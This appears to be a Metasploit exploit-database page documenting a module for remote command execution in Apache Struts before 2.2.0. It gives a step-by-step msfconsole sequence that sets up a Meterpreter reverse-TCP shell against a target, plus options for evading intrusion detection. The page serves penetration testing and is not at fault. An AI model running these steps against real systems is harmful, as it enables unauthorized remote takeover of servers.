Apache Struts < 2.2.0 Remote Command Execution | Metasploit Exploit Database (DB)

Home > Exploit DB

Apache Struts < 2.2.0 Remote Command Execution

This module exploits a remote command execution vulnerability in Apache Struts versions < 2.2.0. This issue is caused by a failure to properly handle unicode characters in OGNL extensive expressions passed to the web server. By sending a specially crafted request to the Struts application it is possible to bypass the "#" restriction on ParameterInterceptors by using OGNL context variables. Bypassing this restriction allows for the execution of arbitrary Java code.

Search Other Modules

Exploit Rank

Excellent

Exploit Authors

bannedit < bannedit [at] metasploit.com >
Meder Kydyraliev < >

Vulnerability References

Exploit Targets

0 - Windows Universal (default)
1 - Linux Universal

Exploit Development

Similar Exploit Modules

Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/multi/http/struts_code_exec
msf exploit(struts_code_exec) > show payloads
msf exploit(struts_code_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(struts_code_exec) > set LHOST [MY IP ADDRESS]
msf exploit(struts_code_exec) > set RHOST [TARGET IP]
msf exploit(struts_code_exec) > set URI [STRING]
msf exploit(struts_code_exec) > exploit

Exploit Module Options

CMD	Execute this command instead of using command stager (default: )
Proxies	Use a proxy chain
RHOST	The target address
RPORT	The target port (default: 8080)
URI	The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action (default: )
VHOST	HTTP server virtual host
BasicAuthPass	The HTTP password to specify for basic authentication
BasicAuthUser	The HTTP username to specify for basic authentication
ContextInformationFile	The information file that contains context information
DOMAIN	The domain to use for windows authentification
DigestAuthIIS	Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DigestAuthPassword	The HTTP password to specify for digest authentication
DigestAuthUser	The HTTP username to specify for digest authentication
DisablePayloadHandler	Disable the handler code for the selected payload
EXE::Custom	Use custom exe instead of automatically generating a payload exe
EXE::FallBack	Use the default template in case the specified one is missing
EXE::Inject	Set to preserve the original EXE function
EXE::OldMethod	Set to use the substitution EXE generation method.
EXE::Path	The directory in which to look for the executable template
EXE::Template	The executable template file name.
EnableContextEncoding	Use transient context when encoding payloads
FingerprintCheck	Conduct a pre-exploit fingerprint verification
NTLM::SendLM	Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM	Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN	Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required
NTLM::UseLMKey	Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session	Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2	Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
SSL	Negotiate SSL for outgoing connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
TFTPHOST	The address of the machine hosting the file via TFTP.
TFTPRSRC	The filename of the TFTP-hosted resource.
UserAgent	The User-Agent header to use for all requests
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module
WfsDelay	Additional delay when waiting for a session
HTTP::header_folding	Enable folding of HTTP headers
HTTP::method_random_case	Use random casing for the HTTP method
HTTP::method_random_invalid	Use a random invalid, HTTP method for request
HTTP::method_random_valid	Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers	Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count	How many fake headers to insert into the HTTP request
HTTP::pad_get_params	Insert random, fake query string variables into the request
HTTP::pad_get_params_count	How many fake query string variables to insert into the request
HTTP::pad_method_uri_count	How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type	What type of whitespace to use between the method and uri (accepted: space, tab, apache)
HTTP::pad_post_params	Insert random, fake post variables into the request
HTTP::pad_post_params_count	How many fake post variables to insert into the request
HTTP::pad_uri_version_count	How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type	What type of whitespace to use between the uri and version (accepted: space, tab, apache)
HTTP::uri_dir_fake_relative	Insert fake relative directories into the uri
HTTP::uri_dir_self_reference	Insert self-referential directories into the uri
HTTP::uri_encode_mode	Enable URI encoding (accepted: none, hex-normal, hex-all, hex-random, u-normal, u-all, u-random)
HTTP::uri_fake_end	Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start	Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url	Use the full URL for all HTTP requests
HTTP::uri_use_backslashes	Use back slashes instead of forward slashes in the uri